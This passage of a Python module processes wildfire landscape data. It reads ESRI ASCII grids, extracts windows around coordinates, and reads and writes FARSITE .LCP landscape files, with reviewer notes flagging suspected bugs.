    When ``lat``/``lon`` are given, the grid is only read if the query point
    falls inside the grid extent; otherwise (None, None) is returned.

    Returns
    -------
    (data, stringHeader) : (np.ndarray, str) or (None, None)
        Full grid values and a regenerated ASC header string.
    """
    with open(file,'r') as f:
        lines = f.readlines()
    # Six-line ASC header; the value is the last space-separated token.
    nCols = float(lines[0].split(' ')[-1].split('\n')[0])
    nRows = float(lines[1].split(' ')[-1].split('\n')[0])
    xll = float(lines[2].split(' ')[-1].split('\n')[0])
    yll = float(lines[3].split(' ')[-1].split('\n')[0])
    fileDx = float(lines[4].split(' ')[-1].split('\n')[0])
    noDataValue = float(lines[5].split(' ')[-1].split('\n')[0])
    xur = xll + fileDx*nCols
    yur = yll + fileDx*nRows
    if lat is not None or lon is not None:
        # Locate the query point in grid indices and require containment.
        Tf, iTf = getTransformFromMtoD()
        queryPoint = iTf.TransformPoints([[lon,lat]])[0]
        centerX = int(np.round(nCols*(queryPoint[0]-xll)/(xur-xll)))
        centerY = int(nRows)-int(np.round(nRows*(queryPoint[1]-yll)/(yur-yll)))
        if debug:
            print("\tpoint\tx\t\ty")
            print("\tll\t%.0f\t%.0f"%(xll,yll))
            print("\tqp\t%.0f\t%.0f"%(queryPoint[0],queryPoint[1]))
            print("\tur\t%.0f\t%.0f"%(xur,yur))
            print("\tfull\t%.0f\t%.0f"%(nCols,nRows))
            print('cen\t%.0f\t%.0f'%(centerX,centerY))
        if centerY > 0 and centerY < nRows and centerX > 0 and centerX < nCols:
            check = True
        else:
            check = False
    else:
        # No query point: always read the grid.
        check = True
    data = []
    if check:
        for i in range(6,int(nRows+6)):
            line = lines[i]
            lineSplit = line.split(' ')
            if lineSplit[0] == ' ':
                lineSplit = lineSplit[1:]
            lineSplit[-1] = lineSplit[-1].split('\n')[0]
            if lineSplit[-1] == '':
                # NOTE(review): this drops the last TWO tokens when the line
                # ends with a blank token; [:-1] may have been intended --
                # confirm against the actual data files.
                lineSplit = lineSplit[:-2]
            data.append(lineSplit)
        data = np.array(data,dtype=np.float32)
        #data[data == noDataValue] = np.nan
        # Regenerate an ASC header string for the full grid.
        header = ['ncols %.0f\n'%(nCols),
                  'nrows %.0f\n'%(nRows),
                  'xllcorner %.12f\n'%(xll),
                  'yllcorner %.12f\n'%(yll),
                  'cellsize %.12f\n'%(fileDx),
                  'NODATA_value %.0f'%(noDataValue)]
        stringHeader = ''
        for line in header:
            stringHeader = stringHeader+line
    else:
        # Only reachable when lat/lon were given, so queryPoint is defined.
        print("Point is not contained in file.")
        print("\tpoint\tx\t\ty")
        print("\tll\t%.0f\t%.0f"%(xll,yll))
        print("\tqp\t%.0f\t%.0f"%(queryPoint[0],queryPoint[1]))
        print("\tur\t%.0f\t%.0f"%(xur,yur))
        data = None
        stringHeader = None
    return data,stringHeader
def queryAsciiFiles(lat,lon,distance,skipMissing=False):
    """Gather base, canopy, and ground ASC layer windows around a query point.

    Returns
    -------
    (fullDatas, headers, fullNames)
        fullDatas: [baseLayerArrays, canopyLayerArrays, groundLayerArrays];
        headers: flat list of header strings across all groups;
        fullNames: per-group lists of source file names.
        (None, None, None) when a required base-layer extract is missing.

    NOTE(review): ``skipMissing`` is accepted but never used -- confirm intent.
    NOTE(review): base layers return early when the extracted window file is
    missing, while canopy/ground layers extract on demand -- confirm the
    asymmetry is intended.
    """
    inDir = 'E:/projects/wildfire-research/farsiteData/'
    #names = ['US_SLP2010','US_140CBD','US_140CBH','US_140CC','US_140CH','US_140FBFM40','US_ASP2010','US_DEM2010']
    names = ['US_DEM2010','US_SLP2010','US_ASP2010','US_140FBFM40','US_140CC']
    canopyNames = ['US_140CH','US_140CBH','US_140CBD']
    groundNames = []
    namespace = getNamespace(lat,lon,distance)
    print(namespace)
    fullDatas = []
    fullNames = []
    filenames = []
    datas = []
    headers = []
    # Base layers: the pre-extracted window file must already exist.
    for name in names:
        filename = inDir+name+'.asc'
        extractedFile = inDir+namespace+'_'+name+'.asc'
        if len(glob.glob(extractedFile)) == 0:
            return None, None, None
        # Try a fresh window from the statewide file; fall back to the
        # previously extracted window when the point is out of bounds.
        data, header = readAscFile(filename,lat,lon,distance)
        if data is not None and header is not None:
            extractedFile = inDir+namespace+'_'+name+'.asc'
            np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
        else:
            data, header = readFullAscFile(extractedFile,lat,lon)
        datas.append(data)
        headers.append(header)
        filenames.append(filename)
    fullDatas.append(datas)
    fullNames.append(filenames)
    datas = []
    filenames = []
    # Canopy layers: extract (and cache) on demand when the window file is
    # missing; otherwise read the cached extract.
    for name in canopyNames:
        filename = inDir+name+'.asc'
        extractedFile = inDir+namespace+'_'+name+'.asc'
        if len(glob.glob(extractedFile)) == 0:
            data, header = readAscFile(filename,lat,lon,distance)
            if data is not None and header is not None:
                extractedFile = inDir+namespace+'_'+name+'.asc'
                np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
        else:
            data, header = readFullAscFile(extractedFile,lat,lon)
        datas.append(data)
        headers.append(header)
        filenames.append(filename)
    fullDatas.append(datas)
    fullNames.append(filenames)
    datas = []
    filenames = []
    # Ground layers (currently none configured): same strategy as canopy.
    for name in groundNames:
        filename = inDir+name+'.asc'
        extractedFile = inDir+namespace+'_'+name+'.asc'
        if len(glob.glob(extractedFile)) == 0:
            data, header = readAscFile(filename,lat,lon,distance)
            if data is not None and header is not None:
                extractedFile = inDir+namespace+'_'+name+'.asc'
                np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
        else:
            data, header = readFullAscFile(extractedFile,lat,lon)
        datas.append(data)
        headers.append(header)
        filenames.append(filename)
    fullDatas.append(datas)
    fullNames.append(filenames)
    return fullDatas, headers, fullNames
def getAscFile(file):
    """Read an ESRI ASCII grid and return (all lines, parsed header tuple).

    The header tuple is (nCols, nRows, xll, yll, cellsize, NODATA_value),
    each parsed as a float from the last space-separated token of the
    corresponding header line.
    """
    with open(file, 'r') as handle:
        lines = handle.readlines()
    # Each of the first six lines carries its value as the last token.
    headerValues = [float(lines[i].split(' ')[-1].split('\n')[0]) for i in range(6)]
    return lines, tuple(headerValues)
def getNamespace(lat,lon,distance):
    """Build a filesystem-safe tag '<lon>_<lat>_<distance>' for a query.

    Minus signs become 'n' and decimal points become '-', so the result can
    be embedded in file names.
    """
    raw = '%.4f_%.4f_%.0f'%(lon,lat,distance)
    return raw.replace('-','n').replace('.','-')
def getCoordinateData(lines,params,lat,lon,distance=None):
    """Extract a square window of ASC grid data centred on (lat, lon).

    Parameters
    ----------
    lines : list of str
        Raw lines of an ESRI ASCII grid (6 header lines + data rows).
    params : tuple
        (nCols, nRows, xll, yll, fileDx, noDataValue) as parsed by getAscFile.
    lat, lon : float
        Query point in WGS84 degrees.
    distance : float, optional
        Half-width of the window in the grid's projected units.  The original
        implementation read a module-level ``distance`` implicitly (a latent
        NameError); passing it explicitly is now supported while the old
        global fallback is kept for backward compatibility.

    Returns
    -------
    (data, stringHeader) : (np.ndarray, str) or (None, None)
        Window of grid values plus a matching ASC header, or (None, None)
        when the point fails checkPoint() or the window cannot be read.
    """
    if distance is None:
        # Backward compatible: fall back to the module-level name the
        # original implementation depended on.
        distance = globals()['distance']
    (nCols,nRows,xll,yll,fileDx,noDataValue) = params
    xur = xll + fileDx*nCols
    yur = yll + fileDx*nRows
    # Project the WGS84 query point into the grid's coordinate system.
    Tf, iTf = getTransformFromMtoD()
    queryPoint = iTf.TransformPoints([[lon,lat]])[0]
    if checkPoint([[lon,lat]]):
        centerX = int(np.round(nCols*(queryPoint[0]-xll)/(xur-xll)))
        centerY = int(nRows)-int(np.round(nRows*(queryPoint[1]-yll)/(yur-yll)))+1
        N = int(distance/fileDx)
        data = []
        try:
            for i in range(6+centerY-N,6+centerY+N+1):
                line = lines[i]
                lineSplit = line.split(' ')[1:]
                lineSplit[-1] = lineSplit[-1].split('\n')[0]
                data.append(lineSplit)
        except IndexError:
            # Window extends past the available rows (was a bare except).
            return None, None
        data = np.array(data,dtype=np.float32)[:,centerX-N:centerX+N+1]
        # Regenerate an ASC header describing the extracted window.
        header = ['ncols %.0f\n'%(2*N+1),
                  'nrows %.0f\n'%(2*N+1),
                  'xllcorner %.12f\n'%(queryPoint[0]-N*fileDx),
                  'yllcorner %.12f\n'%(yll+(nRows-(centerY+N))*fileDx),
                  'cellsize %.12f\n'%(fileDx),
                  'NODATA_value %.0f'%(noDataValue)]
        stringHeader = ''.join(header)
    else:
        data = None
        stringHeader = None
    return data, stringHeader
def extractListOfCoordinates(lats,lons,distance):
    """For every layer and every (lat, lon) pair, save a windowed ASC extract.

    Windows that cannot be extracted (point outside coverage) are skipped
    silently.  Output files are named '<namespace>_<layer>.asc' next to the
    source layers.
    """
    baseDir = 'E:/projects/wildfire-research/farsiteData/'
    layerNames = ['US_DEM2010','US_SLP2010','US_ASP2010','US_140FBFM40','US_140CC',
                  'US_140CH','US_140CBH','US_140CBD']
    for layer in layerNames:
        sourceFile = baseDir+layer+'.asc'
        rawLines, headerParams = getAscFile(sourceFile)
        for queryLat, queryLon in zip(lats,lons):
            window, windowHeader = getCoordinateData(rawLines,headerParams,queryLat,queryLon)
            if window is None or windowHeader is None:
                continue
            outFile = baseDir+getNamespace(queryLat,queryLon,distance)+'_'+layer+'.asc'
            np.savetxt(outFile,window, fmt='%.1f', delimiter=' ',newline='\n', header=windowHeader,comments='')
def limitAscLimits():
    """Crop statewide ASC layers to a fixed projected window, writing *_limited.asc.

    The window (limitXll/limitYll .. limitXur/limitYur, limitXN x limitYN
    cells) is hard-coded; one cropped copy is written per layer in ``names``.
    """
    inDir = 'E:/projects/wildfire-research/farsiteData/'
    names = ['US_DEM2010','US_SLP2010','US_ASP2010','US_140FBFM40']#,'US_140CC',
             #'US_140CH','US_140CBH','US_140CBD']
    #names = ['US_140CC','US_140CH','US_140CBH','US_140CBD']
    # Hard-coded output window: cell counts and corner coordinates.
    limitXN = 30384
    limitYN = 32938
    limitXll = -2362425
    limitYll = 1590585
    limitYur = 2578725
    limitXur = -1450905
    for name in names:
        filename = inDir+name+'.asc'
        newFilename = inDir+name+'_limited.asc'
        lines, params = getAscFile(filename)
        # Header values re-parsed from the raw lines (``params`` is unused).
        nCols = float(lines[0].split(' ')[-1].split('\n')[0])
        nRows = float(lines[1].split(' ')[-1].split('\n')[0])
        xll = float(lines[2].split(' ')[-1].split('\n')[0])
        yll = float(lines[3].split(' ')[-1].split('\n')[0])
        fileDx = float(lines[4].split(' ')[-1].split('\n')[0])
        noDataValue = float(lines[5].split(' ')[-1].split('\n')[0])
        xur = xll + fileDx*nCols
        yur = yll + fileDx*nRows
        # Offsets (in cells) from the grid's top/right edges to the window's.
        yOff = int((yur-limitYur)/fileDx)
        xOff = int((xur-limitXur)/fileDx)
        print(yOff,xOff)
        header = ['ncols %.0f\n'%(limitXN),
                  'nrows %.0f\n'%(limitYN),
                  'xllcorner %.12f\n'%(limitXll),
                  'yllcorner %.12f\n'%(limitYll),
                  'cellsize %.12f\n'%(fileDx),
                  'NODATA_value %.0f\n'%(noDataValue)]
        stringHeader = ''
        for line in header:
            stringHeader = stringHeader+line
        with open(newFilename,'w+') as f:
            f.write(stringHeader)
            for i in range(6+yOff,6+yOff+limitYN):
                line = lines[i]
                lineSplit = line.split(' ')[1:]
                lineSplit[-1] = lineSplit[-1].split('\n')[0]
                data = np.char.mod('%.1f',np.array(lineSplit,dtype=np.float32))
                data = data[xOff:xOff+limitXN]
                # NOTE(review): values are joined with ',' although ESRI ASC
                # grids (and the commented savetxt below) use spaces --
                # confirm downstream readers accept commas.
                dataStr = ",".join(data)
                f.write(dataStr+'\n')
        #np.savetxt(newFilename,data, fmt='%.1f', delimiter=' ',newline='\n', header=stringHeader,comments='')
        #for lat, lon in zip(lats,lons):
        #    data, header = getCoordinateData(lines,params,lat,lon)
        #    if data is not None and header is not None:
        #        namespace = getNamespace(lat,lon,distance)
        #        extractedFile = inDir+namespace+'_'+name+'.asc'
        #        np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
def parseLcpHeader(header):
    """Map the tail of an unpacked LCP header tuple to named fields.

    ``header`` is the tuple produced by readLcpFile(); indices 1037-1066
    hold grid geometry, unit flags, the ten source-file names, and the
    description string.  Returns a dict keyed by field name, in the same
    order as the header.
    """
    fieldNames = ('nX','nY','eastUtm','westUtm','northUtm','southUtm',
                  'gridUnits','xResol','yResol','eUnits','sUnits','aUnits',
                  'fOptions','cUnits','hUnits','bUnits','pUnits','dUnits',
                  'wUnits','elevFile','slopeFile','aspectFile','fuelFile',
                  'coverFile','heightFile','baseFile','densityFile',
                  'duffFile','woodyFile','description')
    return {name: header[1037 + offset] for offset, name in enumerate(fieldNames)}
def readLcpFile(filename):
    """Read a FARSITE landscape (.LCP) file.

    Returns
    -------
    (imgs, names, header)
        imgs: list of float32 band images shaped (nY, nX), with -9999
        converted to NaN; names: band names in file order; header: the full
        unpacked 7316-byte header tuple.
    """
    with open(filename,'rb') as f:
        data = f.read()
    # Fixed LCP header layout: flags/latitude/extents, then ten
    # (lo, hi, num, 100-entry value table) blocks, then grid metadata,
    # unit codes, ten 256-byte source-file names, and a 512-byte description.
    dataFormat = '=llldddd'
    for i in range(0,10):
        dataFormat = dataFormat+'lll%.0fl'%(100)
    dataFormat = dataFormat+'llddddlddhhhhhhhhhh256s256s256s256s256s256s256s256s256s256s512s'
    los = []
    his = []
    nums = []
    values = []
    names = []
    header = struct.unpack(dataFormat,data[:7316])
    # crownFuels/groundFuels == 21 means the optional band groups are present.
    crownFuels = header[0]; groundFuels = header[1]; latitude = header[2];
    loEast = header[3]; hiEast = header[4]
    loNorth = header[5]; hiNorth = header[6]
    # Five mandatory bands: elevation, slope, aspect, fuel, cover.
    loElev = header[7]; hiElev = header[8]; numElev = header[9]; elevationValues = header[10:110]; los.append(loElev); his.append(hiElev); nums.append(numElev); values.append(elevationValues); names.append('Elevation')
    loSlope = header[110]; hiSlope = header[111]; numSlope = header[112]; slopeValues = header[113:213]; los.append(loSlope); his.append(hiSlope); nums.append(numSlope); values.append(slopeValues); names.append('Slope')
    loAspect = header[213]; hiAspect = header[214]; numAspect = header[215]; aspectValues = header[216:316]; los.append(loAspect); his.append(hiAspect); nums.append(numAspect); values.append(aspectValues); names.append('Aspect')
    loFuel = header[316]; hiFuel = header[317]; numFuel = header[318]; fuelValues = header[319:419]; los.append(loFuel); his.append(hiFuel); nums.append(numFuel); values.append(fuelValues); names.append('Fuel')
    loCover = header[419]; hiCover = header[420]; numCover = header[421]; coverValues = header[422:522]; los.append(loCover); his.append(hiCover); nums.append(numCover); values.append(coverValues); names.append('Cover')
    # Optional canopy (3 bands) and/or ground (2 bands) groups determine the
    # total band count in the body.
    if crownFuels == 21 and groundFuels == 21:
        loHeight = header[522]; hiHeight = header[523]; numHeight = header[524]; heightValues = header[525:625]; los.append(loHeight); his.append(hiHeight); nums.append(numHeight); values.append(heightValues); names.append('Canopy Height')
        loBase = header[625]; hiBase = header[626]; numBase = header[627]; baseValues = header[628:728]; los.append(loBase); his.append(hiBase); nums.append(numBase); values.append(baseValues); names.append('Canopy Base Height')
        loDensity = header[728]; hiDensity = header[729]; numDensity = header[730]; densityValues = header[731:831]; los.append(loDensity); his.append(hiDensity); nums.append(numDensity); values.append(densityValues); names.append('Canopy Density')
        loDuff = header[831]; hiDuff = header[832]; numDuff = header[833]; duffValues = header[834:934]; los.append(loDuff); his.append(hiDuff); nums.append(numDuff); values.append(duffValues); names.append('Duff')
        loWoody = header[934]; hiWoody = header[935]; numWoody = header[936]; woodyValues = header[937:1037]; los.append(loWoody); his.append(hiWoody); nums.append(numWoody); values.append(woodyValues); names.append('Coarse Woody')
        numImgs = 10
    elif crownFuels == 21 and groundFuels == 20:
        loHeight = header[522]; hiHeight = header[523]; numHeight = header[524]; heightValues = header[525:625]; los.append(loHeight); his.append(hiHeight); nums.append(numHeight); values.append(heightValues); names.append('Canopy Height')
        loBase = header[625]; hiBase = header[626]; numBase = header[627]; baseValues = header[628:728]; los.append(loBase); his.append(hiBase); nums.append(numBase); values.append(baseValues); names.append('Canopy Base Height')
        loDensity = header[728]; hiDensity = header[729]; numDensity = header[730]; densityValues = header[731:831]; los.append(loDensity); his.append(hiDensity); nums.append(numDensity); values.append(densityValues); names.append('Canopy Density')
        numImgs = 8
    elif crownFuels == 20 and groundFuels == 21:
        loDuff = header[831]; hiDuff = header[832]; numDuff = header[833]; duffValues = header[834:934]; los.append(loDuff); his.append(hiDuff); nums.append(numDuff); values.append(duffValues); names.append('Duff')
        loWoody = header[934]; hiWoody = header[935]; numWoody = header[936]; woodyValues = header[937:1037]; los.append(loWoody); his.append(hiWoody); nums.append(numWoody); values.append(woodyValues); names.append('Coarse Woody')
        numImgs = 7
    else:
        numImgs = 5
    # Grid geometry, units, and file-name metadata (see parseLcpHeader).
    nX = header[1037]; nY = header[1038]
    eastUtm = header[1039]; westUtm = header[1040]
    northUtm = header[1041]; southUtm = header[1042]
    gridUnits = header[1043];
    xResol = header[1044]; yResol = header[1045];
    eUnits = header[1046]; sUnits = header[1047];
    aUnits = header[1048]; fOptions = header[1049];
    cUnits = header[1050]; hUnits = header[1051];
    bUnits = header[1052]; pUnits = header[1053];
    dUnits = header[1054]; wUnits = header[1055];
    elevFile = header[1056]; slopeFile = header[1057];
    aspectFile = header[1058]; fuelFile = header[1059];
    coverFile = header[1060]; heightFile = header[1061];
    baseFile = header[1062]; densityFile = header[1063];
    duffFile = header[1064]; woodyFile = header[1065];
    description = header[1066]
    # Body: numImgs bands of nX*nY int16 values, interleaved by band.
    bodyFormat = ''
    for i in range(0,numImgs):
        bodyFormat = bodyFormat+'%.0fh'%(nX*nY)
    body = np.array(struct.unpack(bodyFormat,data[7316:]))
    imgs = np.split(body,numImgs)
    for i in range(0,numImgs):
        # De-interleave band i, map -9999 to NaN, reshape to (nY, nX).
        img = body[i::numImgs]
        img = np.array(img,dtype=np.float32)
        img[img == -9999] = np.nan
        imgs[i] = np.reshape(img,(nY,nX),order='C')
    return imgs, names, header
def checkLcpFile(lcpFile=None,rawFiles=None,case=0):
    """Visually compare each band of an LCP file to its source ASC raster.

    When ``lcpFile``/``rawFiles`` are omitted, a predefined Ashley test set
    is selected by ``case``: 0 = all ten layers, 1 = base five, 2 = base
    five plus canopy, 3 = base five plus ground.  One figure per band is
    drawn with the LCP band on the left and the raw ASC on the right.

    Raises
    ------
    ValueError
        If files are omitted and ``case`` is not 0-3 (previously this fell
        through to an UnboundLocalError).
    """
    if lcpFile is None or rawFiles is None:
        if case == 0: # all data files
            rawFiles = ['C:/FARSITE 4/Ashley/input/ash_elev.asc',
                        'C:/FARSITE 4/Ashley/input/ash_slope.asc',
                        'C:/FARSITE 4/Ashley/input/ash_aspect.asc',
                        'C:/FARSITE 4/Ashley/input/ash_fuel.asc',
                        'C:/FARSITE 4/Ashley/input/ash_canopy.asc',
                        'C:/FARSITE 4/Ashley/input/ash_height.asc',
                        'C:/FARSITE 4/Ashley/input/ash_cbh.asc',
                        'C:/FARSITE 4/Ashley/input/ash_cbd.asc',
                        'C:/FARSITE 4/Ashley/input/ash_duff.asc',
                        'C:/FARSITE 4/Ashley/input/ash_cwd.asc']
            lcpFile = 'C:/FARSITE 4/Ashley/input/ashleyFull.lcp'
        elif case == 1: # first five data files
            rawFiles = ['C:/FARSITE 4/Ashley/input/ash_elev.asc',
                        'C:/FARSITE 4/Ashley/input/ash_slope.asc',
                        'C:/FARSITE 4/Ashley/input/ash_aspect.asc',
                        'C:/FARSITE 4/Ashley/input/ash_fuel.asc',
                        'C:/FARSITE 4/Ashley/input/ash_canopy.asc']
            lcpFile = 'C:/FARSITE 4/Ashley/input/ashleyFive.lcp'
        elif case == 2: # first five + 3 canopy files
            rawFiles = ['C:/FARSITE 4/Ashley/input/ash_elev.asc',
                        'C:/FARSITE 4/Ashley/input/ash_slope.asc',
                        'C:/FARSITE 4/Ashley/input/ash_aspect.asc',
                        'C:/FARSITE 4/Ashley/input/ash_fuel.asc',
                        'C:/FARSITE 4/Ashley/input/ash_canopy.asc',
                        'C:/FARSITE 4/Ashley/input/ash_height.asc',
                        'C:/FARSITE 4/Ashley/input/ash_cbh.asc',
                        'C:/FARSITE 4/Ashley/input/ash_cbd.asc']
            lcpFile = 'C:/FARSITE 4/Ashley/input/ashleyCanopy.lcp'
        elif case == 3: # first five + 2 ground files
            rawFiles = ['C:/FARSITE 4/Ashley/input/ash_elev.asc',
                        'C:/FARSITE 4/Ashley/input/ash_slope.asc',
                        'C:/FARSITE 4/Ashley/input/ash_aspect.asc',
                        'C:/FARSITE 4/Ashley/input/ash_fuel.asc',
                        'C:/FARSITE 4/Ashley/input/ash_canopy.asc',
                        'C:/FARSITE 4/Ashley/input/ash_duff.asc',
                        'C:/FARSITE 4/Ashley/input/ash_cwd.asc']
            lcpFile = 'C:/FARSITE 4/Ashley/input/ashleyGround.lcp'
        else:
            raise ValueError('case must be 0-3 when files are not given: %s'%(case))
    # Bug fix: readLcpFile returns (imgs, names, header); the original
    # two-name unpack raised ValueError on every call.
    imgs, names, header = readLcpFile(lcpFile)
    for i in range(0,len(imgs)):
        plt.figure(figsize=(20,4))
        plt.subplot(1,2,1)
        plt.imshow(imgs[i],cmap='jet'); plt.colorbar();
        plt.subplot(1,2,2)
        imgRaw, headerRaw = readFullAscFile(rawFiles[i])
        # Mask no-data values so they do not dominate the color scale.
        imgRaw[imgRaw<-1000] = np.nan
        plt.imshow(imgRaw,cmap='jet'); plt.colorbar();
def generateLcpFile(lat,lon,distance,indir,
        gridUnits=0,
        eUnits=0,
        sUnits=0,
        aUnits=2,
        fOptions=0,
        cUnits=1,
        hUnits=3,
        bUnits=3,
        pUnits=1,
        dUnits=0,
        wUnits=0):
    """Build a FARSITE landscape (.LCP) file around a query point.

    Reads the base (and optional canopy/ground) layers via queryAsciiFiles(),
    packs the LCP header and interleaved int16 body with struct, and writes
    '<namespace>.LCP' into ``indir``.

    Returns
    -------
    (datas, headers, names) from queryAsciiFiles(), or (None, None, None)
    when the point is outside the supported polygon or layers are missing.
    """
    if checkPoint([[lon,lat]]):
        datas, headers, names = queryAsciiFiles(lat,lon,distance,skipMissing=True)
        if datas is not None and headers is not None and names is not None:
            # Parse ncols/nrows/xll/yll/cellsize from the first layer header.
            sH = [float(x.split(' ')[-1]) for x in headers[0].split('\n')]
            # 21 flags an optional band group as present, 20 as absent.
            crownFuels = 21 if len(datas[1]) > 0 else 20
            groundFuels = 21 if len(datas[2]) > 0 else 20
            latitude = lat
            nCols = sH[0]
            nRows = sH[1]
            westUtm = sH[2]
            southUtm = sH[3]
            xResol = sH[4]
            yResol = sH[4]
            eastUtm = westUtm + xResol*nCols
            northUtm = southUtm + yResol*nRows
            # lo/hi extents are expressed relative to the nearest 1000 m.
            loEast = westUtm - round(westUtm,-3)
            hiEast = loEast + xResol*nCols
            loNorth = southUtm - round(southUtm,-3)
            hiNorth = loNorth + yResol*nRows
            dataFormat = '=llldddd'
            header = struct.pack(dataFormat,crownFuels,groundFuels,int(latitude),loEast,hiEast,loNorth,hiNorth)
            # Five mandatory band-summary blocks (lo, hi, num, value table).
            for i in range(0,5):
                data = datas[0][i]
                name = names[0][i]
                if 'US_ASP2010' in name:
                    # Negative aspect values are no-data.
                    data[data < 0] = -9999
                packed, lo, hi, num, values = getHeaderInfo(data)
                header = header + packed
            # Canopy band summaries, or zero-filled placeholder blocks.
            if crownFuels == 21:
                for data in datas[1]:
                    packed, lo, hi, num, values = getHeaderInfo(data)
                    header = header + packed
            else:
                header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
                header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
                header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
            # Ground band summaries, or zero-filled placeholder blocks.
            if groundFuels == 21:
                for data in datas[2]:
                    packed, lo, hi, num, values = getHeaderInfo(data)
                    header = header + packed
            else:
                header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
                header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
            # Grid geometry and unit codes.
            header = header+struct.pack('=ll',int(nCols),int(nRows))
            header = header+struct.pack('=ddddldd',eastUtm,westUtm,northUtm,southUtm,gridUnits,xResol,yResol)
            header = header+struct.pack('=hhhhhhhhhh',eUnits,sUnits,aUnits,fOptions,cUnits,hUnits,bUnits,pUnits,dUnits,wUnits)
            # Ten 256-byte source-file-name slots (blank when absent).
            for name in names[0]:
                header = header + struct.pack('=256s',str.encode(name))
            if crownFuels == 21:
                for name in names[1]:
                    header = header + struct.pack('=256s',str.encode(name))
            else:
                header = header + struct.pack('=256s',str.encode(''))
                header = header + struct.pack('=256s',str.encode(''))
                header = header + struct.pack('=256s',str.encode(''))
            if groundFuels == 21:
                for name in names[2]:
                    header = header + struct.pack('=256s',str.encode(name))
            else:
                header = header + struct.pack('=256s',str.encode(''))
                header = header + struct.pack('=256s',str.encode(''))
            # Bug fix: lat/lon were swapped in the description labels.
            description = 'Automatically generated. lat = %.4f, lon = %.4f, dist = %.0f'%(lat,lon,distance)
            header = header + struct.pack('=512s',str.encode(description))
            # Body: one int16 per cell per band, interleaved by band.
            imgSize = int(nCols*nRows)
            numImgs = int(len(datas[0])+len(datas[1])+len(datas[2]))
            totalSize = int(imgSize*numImgs)
            allImgs = np.zeros((totalSize))
            ct = 0
            for data in datas[0]:
                allImgs[ct::numImgs] = np.reshape(data,(imgSize))
                ct = ct+1
            for data in datas[1]:
                allImgs[ct::numImgs] = np.reshape(data,(imgSize))
                ct = ct+1
            for data in datas[2]:
                allImgs[ct::numImgs] = np.reshape(data,(imgSize))
                ct = ct+1
            allImgs = np.array(allImgs,dtype=np.int16)
            dataFormat = '=%.0fh'%(totalSize)
            body = struct.pack(dataFormat,*allImgs)
            # Consistency: reuse the shared namespace helper instead of
            # duplicating its replace() logic inline.
            namespace = getNamespace(lat,lon,distance)
            with open(indir+namespace+'.LCP','wb') as f:
                f.write(header+body)
        return datas, headers, names
    else:
        return None, None, None
def generateLcpFileTif(indir,names,outname,
        gridUnits=0,
        eUnits=0,
        sUnits=0,
        aUnits=2,
        fOptions=0,
        cUnits=1,
        hUnits=3,
        bUnits=3,
        pUnits=1,
        dUnits=0,
        wUnits=0):
    """Build a FARSITE landscape (.LCP) file from a set of GeoTIFF layers.

    ``names`` are tif base names under ``indir``; the packed landscape is
    written to ``outname``.  Returns (datas, headers, names).

    NOTE(review): several parts of this routine look inconsistent with its
    sibling generateLcpFile (``datas`` is a flat list of arrays here, not
    nested per group) -- see inline notes before relying on it.
    """
    datas = []
    headers = []
    # Read each layer flat (one 1-D array per tif) and regenerate an
    # ASC-style header string from the geotransform.
    for name in names:
        print("Reading %s"%(name))
        file = gdal.Open(indir+name+'.tif')
        band = file.GetRasterBand(1)
        noDataValue = band.GetNoDataValue() if band.GetNoDataValue() is not None else -9999
        nCols = file.RasterXSize
        nRows = file.RasterYSize
        xll = file.GetGeoTransform()[0]
        yll = file.GetGeoTransform()[3]+file.GetGeoTransform()[5]*file.RasterYSize
        fileDx = file.GetGeoTransform()[1]
        header = ['ncols %.0f\n'%(nCols),
                  'nrows %.0f\n'%(nRows),
                  'xllcorner %.12f\n'%(xll),
                  'yllcorner %.12f\n'%(yll),
                  'cellsize %.12f\n'%(fileDx),
                  'NODATA_value %.0f'%(noDataValue)]
        stringHeader = ''
        for line in header:
            stringHeader = stringHeader+line
        headers.append(stringHeader)
        datas.append(np.reshape(band.ReadAsArray(),(nCols*nRows,)))
    #assert False, "Stopped"
    # Latitude for the LCP header comes from the last layer's grid centre.
    Tf, iTf = getTransformFromMtoD()
    centerCoordinates = Tf.TransformPoints([[xll+fileDx*nCols/2,yll+fileDx*nRows/2]])[0][:-1]
    #datas, headers, names = queryAsciiFiles(lat,lon,distance,skipMissing=True)
    #if datas is not None and headers is not None and names is not None:
    sH = [float(x.split(' ')[-1]) for x in headers[0].split('\n')]
    # Band-group presence inferred purely from the layer count.
    crownFuels = 21 if len(datas) == 8 or len(datas) == 10 else 20
    groundFuels = 21 if len(datas) == 7 or len(datas) == 10 else 20
    print(crownFuels,groundFuels)
    latitude = centerCoordinates[1]
    nCols = sH[0]
    nRows = sH[1]
    westUtm = sH[2]
    southUtm = sH[3]
    xResol = sH[4]
    yResol = sH[4]
    eastUtm = westUtm + xResol*nCols
    northUtm = southUtm + yResol*nRows
    loEast = westUtm - round(westUtm,-3)
    hiEast = loEast + xResol*nCols
    loNorth = southUtm - round(southUtm,-3)
    hiNorth = loNorth + yResol*nRows
    #print(crownFuels,groundFuels,latitude,loEast,hiEast,loNorth,hiNorth)
    dataFormat = '=llldddd'
    header = struct.pack(dataFormat,crownFuels,groundFuels,int(latitude),loEast,hiEast,loNorth,hiNorth)
    for i in range(0,5):
        # NOTE(review): ``datas`` is a flat list of arrays here, so
        # datas[0][i] indexes elements of the FIRST array and names[0][i]
        # indexes characters of the FIRST name string -- this looks like it
        # was copied from generateLcpFile (nested lists); confirm.
        data = datas[0][i]
        name = names[0][i]
        if 'US_ASP2010' in name:
            data[data < 0] = -9999
        packed, lo, hi, num, values = getHeaderInfo(data)
        header = header + packed
    if crownFuels == 21:
        # NOTE(review): after the loop above i == 4, so this reads
        # datas[4..6]; the canopy layers would be datas[5..7] -- confirm.
        for j in range(i,i+3):
            packed, lo, hi, num, values = getHeaderInfo(datas[j])
            header = header + packed
    else:
        header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
